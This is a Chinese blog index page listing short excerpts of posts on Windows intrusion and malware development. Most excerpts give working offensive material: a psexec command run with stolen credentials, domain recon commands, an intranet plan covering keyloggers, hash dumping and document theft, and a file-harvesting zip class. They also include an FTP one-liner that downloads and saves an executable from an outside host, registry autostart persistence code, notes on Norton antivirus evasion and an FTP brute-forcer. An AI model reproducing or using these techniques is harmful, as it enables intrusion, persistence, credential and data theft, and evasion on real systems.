- 博客(430)
- 资源 (13)
- 收藏
- 关注
原创 pstools psexec 执行文件
在目标上第一次执行时会有一个提示,请使用如下命令设置为“同意”pslist.exe -accepteula拿到目标用户与密码以后,通过psexec来执行一个文件命令如下 Psexec.exe \\10.10.7.123 -u user -p 9893 -d D:\dell\s.exe
2013-07-22 11:29:53 1756
原创 域命令相关命令
关于域命令的东西,为方便大家,整理一份,希望给大家带来一些帮助!~查询域管理员用户:net group “domain admins” /domain查询域用户:net user /domain查询域名称:net view /domain查询域内计算机:net view /domain:XX查询域控制器:net time /domain查询所有域控制器:dsquery server例:dsquer
2013-07-20 17:46:45 4376
转载 WIN7及以上系统如何输入序列号并激活成正式版?
三、WIN7及以上系统如何输入序列号并激活成正式版? 注意:在WIN7,WIN2008 SERVER等系统中,卸载界面是没有显示出输入序列号的地方,微软将输入的位置隐藏起来了。那么在WIN7或WIN2008系统中,如何升级输入序列号呢?我们需要借助CrackVS2008ForWindows7.zip这个工具,将隐藏的输入框找回来。具体的操作方法如下:1. 安装 VS2008 (如果你已经安装了,那
2013-07-15 17:47:35 8286
原创 内网渗透思路
内网渗透思路1. 加固,感染系统盘之外的EXE文件保护目标。2. 上键盘记录和USB插件3. 记录目标杀软。4. 抓取HASH。5. 获取目标网络环境,工作组还是域环境。6. 搜索主机是否有网络管理软件5. 搜索主机中所有docxls ppt等关键文件,并下载。6. 对方是否使用outlook,下载PST文件并抓取密码。7. 查看对方是否连接过338
2013-07-09 18:23:30 2392
原创 自动搜索文件并打包成ZIP包
编写一个类实现如下功能1.从电脑中搜索所有的DOC,PDF,XLS文件,搜索文件时可以判断文件的修改时间,扩展名和修改时间从INI配置文件中读取。2.把搜索到的所有文件用ZIP打包压缩,每个ZIP包不超过50M。ZIP打包可以使用ZipArchive库3.打包的ZIP文件保存到如下目录GetEnvironmentVariable("ALLUSERSPROFILE",str_path,MAX_PAT
2013-07-06 08:56:14 1604
转载 浅谈内网渗透
假设我们现在已经处在一个内网中,该内网处于域中。我们的终极目标是实现对域控制器的控制。内网信息获取信息的获取直接通过Windows自带的命令即可实现,简单写出来:ipconfig /allnetstat –annet startnet usernet user /domainnet group “domain admins” #查看域管理员net localgroup a
2013-07-05 15:34:49 1415
转载 常规内网渗透思路总结
相对来说,网上的资料少之又少,很少有人对内网渗透写出一些详细的资料以供同行们参考。今天在这,只是大致的讲一下内网的一些知识。 首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了。但是,如果你的目标是一个大WEB,或者一个大公司,那你就必须考虑内网的问题。 在我们的渗透过程中,很多大型网络的外部网站或是服务器不一定有用,当然外网也可以作为我们的一个突破口,
2013-07-05 15:06:28 2663
原创 创建多层目录
在创建多级文件夹时用 API CreateDirectory一级一级创建文件夹的方法很是麻烦,现在用SHCreateDirectoryEx一条语句就搞定下面是一个简单的示例:#include//注意这里一定要加shlobj.h#include int WINAPI WinMain(HI
2013-06-27 14:10:41 1420
原创 MSF搜集邮箱
use auxiliary/gather/search_email_collectormsf auxiliary(search_email_collector) > set DOMAIN 163.comDOMAIN => 163.commsf auxiliary(search_email_collector) > set SEARCH_BINGSEARCH_BING => truemsf auxi
2013-06-20 11:08:30 2333
原创 木马后门常用到的API
用来分析木马后的功能,简单整理如下:1.服务管理OpenSCManagerOpenServiceEnumServicesStatusQueryServiceConfigControlService2.屏幕管理CreateDCGetDeviceCapsCreateCompatibleBitmapCreateCompatibleDCOpenWindowStationOpenDesktop3.命令控制C
2013-06-04 09:35:00 3242
转载 8.4.3 带ARP欺骗攻击的渗透利刃--hijack(1)
8.4.3 带ARP欺骗攻击的渗透利刃--hijack(1)2009-12-21 13:28 肖遥 电子工业出版社 我要评论(0) 字号:T | T综合评级:想读(9) 在读(5) 已读(2) 品书斋鉴(1) 已有16人发表书评《网络渗透攻击与安防修炼》第1章为大家讲述的是入侵不过是一场欺骗,渗透入侵的高级手法。本节为大家介绍带ARP欺骗攻击的渗透利刃--hijack。AD:2013大
2013-05-15 19:28:02 1672
原创 CreateFile 独占打开文件
小唐,独占打开文件,其它文件再也无法打开,实现代码如下#include int main(int argc, char* argv[]){ HANDLE file_handle; file_handle = CreateFile(".\\xxoo.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, NULL, NULL); pr
2013-05-15 17:11:52 7575
原创 网页下载 iframe
var ifr = document.createElement("iframe")ifr.setAttribute("frameborder",0);ifr.setAttribute("src","http://gdown.baidu.com/data/wisegame/3473e83432c23659/meituan.apk");document.body.appendChild(ifr
2013-05-08 10:38:12 1627
原创 VC多线程临界区(转)
VC多线程临界区(转) 在使用多线程时,一般很少有多个线程完全独立的工作。往往是多个线程同时操作一个全局变量来获取程序的运行结果。多个线程同时访问同一个全局变量,如果都是读取操作,则不会出现问题。如果是写操作,则会发生错误。这时候,我们可以通过临界区,为全局变量设置一个保护,保证同时只有一个线程可以访问此变量,其他变量进入等待状态。 临界区(Critical Section)是
2013-04-27 15:30:23 1145
原创 ini保存数据
TCHAR str_count[100]; int i_data_index; TCHAR str_ini_path[MAX_PATH]; GetModuleFileName(NULL,str_ini_path,MAX_PATH); PathRemoveFileSpec(str_ini_path); _tcscat(str_ini_path,_T("\\ini.ini"))
2013-04-23 10:33:22 1208
原创 分离路径
TCHAR str_ini_path[MAX_PATH]; GetModuleFileName(NULL,str_ini_path,MAX_PATH); PathRemoveFileSpec(str_ini_path); _tcscat(str_ini_path,_T("\\ini.ini")); MessageBox(0,str_ini_path,str_ini_path
2013-04-23 10:32:10 998
转载 redhat tftp 安装启动
2、创建tftp根目录,关闭防火墙,启动tftp-server。#mkdir /tftpboot#chmod o+w /tftpboot #/etc/init.d/iptables stop //关闭防火墙#service xinetd restart //重启 xinetd 服务如果之前tftpboot里有东西,如果执行下面测试时就要先改了那文件的属
2013-04-20 13:28:51 1313
原创 命令行下FTP 命令下载执行文件
cmd.exe /c echo open 222hrc-service.xicp.net>d:\ftp.txt&cmd.exe /c echo user>>d:\ftp.txt&cmd.exe /c echo pass>>d:\ftp.txt&cmd.exe /c echo get m d:\m.exe>>d:\ftp.txt&cmd.exe /c echo bye>>d:\ftp.txt&cmd
2013-04-12 10:52:09 4095
原创 HTTP 隧道通讯库 HTTPTunnel
HTTPTunnel 是一个 C++ 开发用于在两台机器之间进行 HTTP 隧道通讯的类库。HTTP隧道是一种在HTTP协议层上进行Socket通讯的机制。主页:http://the-linux-academy.co.uk/downloads.htm下载:http://the-linux-academy.co.uk/downloads/httptunnel-1.3.2.tgz
2013-04-10 14:46:57 1531
转载 使用WinINet实现HTTP下载者
网上很难找到比较好的使用WinINet实现HTTP下载的代码,经过半天的研究MSDN(可以搜索关键字:MSDN HTTP sessions,链接:http://msdn.microsoft.com/en-us/library/aa384322(v=vs.85).aspx),还有在google的code搜索中找了一些例子(比如:这里),终于自己实现了一个简单的下载函数,记录到这里备忘。函数特点:通过
2013-04-10 09:55:57 6097
原创 注册表 load 启动
直接调用写注册表进行启动,启动方式为 LOAD ,封装好了两个函数可以直接调用啦。没怎么加容错处理。代码洁癖症愈发严重。int exist_startup()//写记号 标记有没有设置过启动项{ HKEY key; if(RegOpenKey(HKEY_CURRENT_USER,_T("software\\XXZH"),&key) == ERROR_SUCCESS){ RegClose
2013-03-29 16:52:46 2329
原创 把文件读到内存,日,每次都出问题。
void ReadFile(char* str){HANDLE pfile;pfile = ::CreateFile(str,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_DELETE_ON_CLOSE,NULL); // 用这个函数比OpenFile好if ( pfile == INVALID_HAN
2013-03-27 14:30:23 1128
原创 高级语言程序转换SHELLCODE时编码注意
使用VC写的DLL通过内存加载类,转成SHELLCODE,发现一个诡异的问题,程序直接运行操作与下载无任何问题,下载10G数据也不会出错。但转成SHELLCODE后,诡异的问题,就出现了,不确定时间地点,出错。经过3个多小时,每句代码排查,找出问题原因,使用了如下代码:UINT ProcFileEnumWillDown(TCHAR * str_path)//枚举要下载的文件夹{ CListDi
2013-03-23 18:23:34 4570 1
原创 诺顿(Norton)免杀账号
诺顿(Norton)这个东西做免杀,并不困难,如果是改代码免杀,很轻松,如果不改代码的情况下免杀也是可以的。原理简单说一下,诺顿(Norton)会判断文件的使用数量,信任程度,创建时间。围绕这几点可以做很多工作,具体工具自己考虑下啦。121121606,1085241217,478735202,gotoc,lengfeng54.yahoo
2013-03-23 11:33:47 2393
转载 vc++ MFC-CListCtrl控件的16条常用操作
1. CListCtrl 样式及设置 LVS_ICON: 每个item显示大图标 LVS_SMALLICON: 每个item显示小图标 LVS_LIST: 显示一列带有小图标的item LVS_REPORT: 显示item详细资料如windows资源管理器,“查看”标签下的“大图标,小图标,列表,详细资料”LONG lStyle; lStyle=GetWindowLong(m_ListCtrl.m
2013-03-16 22:40:31 1479
转载 利用ZipArchive库进行压缩和解压文件
最近需要修改以前做的一个下载程序,主要是增加压缩和解压的功能,以减少网络带宽的消耗.去论坛咨询了一下网友,于是借助开源库ZipArchive来实现我要的功能。初步看了一下ZipArchive文档,简单地封装了一下压缩和解压功能.代码如下:/** CompressZipFile: 压缩文件* lpszFile: 需要压缩的文件* lpszZipFile: 要压缩到的目标文件* bAppend
2013-03-13 10:25:03 4772
原创 远程控制文件管理目录传输路径分割分离
在远程控制中文件管理是很重要的,下面简单讨论并实现目录传输。首先要考虑目录传输方式,速度,效率,一个好的设计应该是这样首先把用户要枚举的目录搜索出来,并整合成一个大的字符串,比如用户搜索了C盘那么应该把所有目录整理成一个大串并一次通过SOCKET发送到CLIENT然后再分离,分解,分割。并在相应的LIST或者TREE上显示我曾通过VECTOR向量方式来实现目录管理,但是VECTOR中每一项的数据并
2013-03-11 12:40:48 1757
原创 一些 DOS 命令
一些 DOS 命令参考:net use file://ip/ipc$ " " /user:" " 建立IPC空链接net use file://ip/ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: file://ip/c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: file://ip/c$ 登陆后映射对方C:到本地
2013-03-07 12:00:49 895
原创 DLL的线程中创建WINDOWS窗口并接收U盘移动磁盘查入消息
这个问题注意以下几个关键点1.DLL的句柄的传入2.线程中的消息循环HINSTANCE g_hInstance;TCHAR U[2]; //保存U盘的盘符 TCHAR FirstDriveFromMask(ULONG unitmask) { char i; for (i = 0; i < 26; ++i) { if (unitmask & 0x1)//看该驱动
2013-03-06 10:49:47 2343
转载 使用C/Delphi编写ShellCode
这里说的ShellCode指的是一段x86机器码,无需重定位,在内存任何位置都可以执行的代码.使用C/Delphi编写代码也是由其编译器特性决定的。一说起ShellCode,一般人都想到MASM/TASM/FASM/NASM这类汇编语言编译器,但是,汇编语言写ShellCode维护起来总是很麻烦,肯定不如高级语言维护起来方便,尤其是大型的工程,例如PE Virus/Packer这样的工程。Shel
2013-03-06 08:28:33 2771
原创 搜索磁盘和移动磁盘
void first_search_move_disk(){ int DviveIndex='C'; int i= 0; while((DviveIndex++)<'Z') { TCHAR DriveName[3]; _stprintf(DriveName,_T("%c:\\"),DviveIndex); UINT TP=GetDriveType(DriveName);
2013-03-05 23:10:21 924
原创 获取环境变量all user appdata
TCHAR str_all_user_path[MAX_PATH]={0}; TCHAR str_full_path[MAX_PATH]={0}; GetEnvironmentVariable(_T("ALLUSERSPROFILE"),str_all_user_path,MAX_PATH); _stprintf(str_full_path,_T("%s\\updata"),str_al
2013-03-05 14:28:05 1907
原创 搜索目录文件夹的类
有时要搜索一个指定目录中的文件夹从自己的一个文件管理类中整理出来的完整代码如下#include #include #include struct MyFileStruct { TCHAR szFileName[MAX_PATH/2]; TCHAR szFilePath[MAX_PATH]; TCHAR szTime[MAX_PATH/2]; TCHAR szFileS
2013-03-05 14:20:28 1011
原创 SetErrorMode禁弹出软盘对话框
int set_error(){ SetErrorMode(SEM_NOOPENFILEERRORBOX|SEM_NOOPENFILEERRORBOX|SEM_NOGPFAULTERRORBOX|SEM_NOALIGNMENTFAULTEXCEPT|SEM_FAILCRITICALERRORS); return 1;}如果试图从一个没有软盘的软驱中读数据,则系统显示一个信息框告诉用户重新
2013-03-05 14:12:52 2508
转载 用VC打造Ftp暴力破解器
看我用VC打造Ftp暴力破解器 hammers 《黑防》第九期刊载了无敌小龙的VB打造FTP密码暴力破解工具,他是采用抓包的方式,直接利用VB和ftp协议来做的这个破解工具,其实如果用现成的类库,效果可能会更好些,C++效率也能更高些。下面我就用VC编程的方法,实现一个Ftp暴力破解器,从技术层面上做一下探讨。 我们打造的这个破解器,主要用到了VC中的两个类,分别是CInt
2013-03-05 10:12:11 6019 1
原创 MessageBox 是否
if(MessageBox(_TEXT("确实要删除本文件吗?"),_TEXT("提示"),MB_YESNO|MB_ICONQUESTION)!=IDYES) { return ; }
2013-02-25 14:13:44 1254
原创 把文件读到内存中然后使用内存加载
分两种方式实现C++和Cint read_dll_memory_load (TCHAR str_dll_path[],char str_export_fun[]) //用C++的方式把文件读到内存加载{ filebuf *pbuf; ifstream filestr; long size; char * buffer; filestr.open (str_dll_
2013-02-24 09:22:29 8500 4
原创 获取当前时间做为当前文件名
SYSTEMTIME sys; GetLocalTime( &sys ); char str_time_name[MAX_PATH]; sprintf( str_time_name,"%d%d%d%d%d%d.jpg" ,sys.wYear,sys.wMonth,sys.wDay,sys.wHour,sys.wMinute,sys.wSecond);
2013-02-24 09:18:53 2254
原创 读取文件大小 获取文件长度
读取文件大小UINT read_binary_size(TCHAR file_name[]){ HANDLE hFile = CreateFile(file_name, GENERIC_READ , 0, NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile==NULL||hFile==INVALID_HANDLE_VALU
2013-02-22 11:08:17 1566
SPI 注入 安装模板
2012-07-26
detours2.1 VC6中编译方法及源代码及使用例子及编译好的BIN
2012-07-12
视频捕获-mpeg4压缩-网络传送源码(VC 6.0)
2011-02-28
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人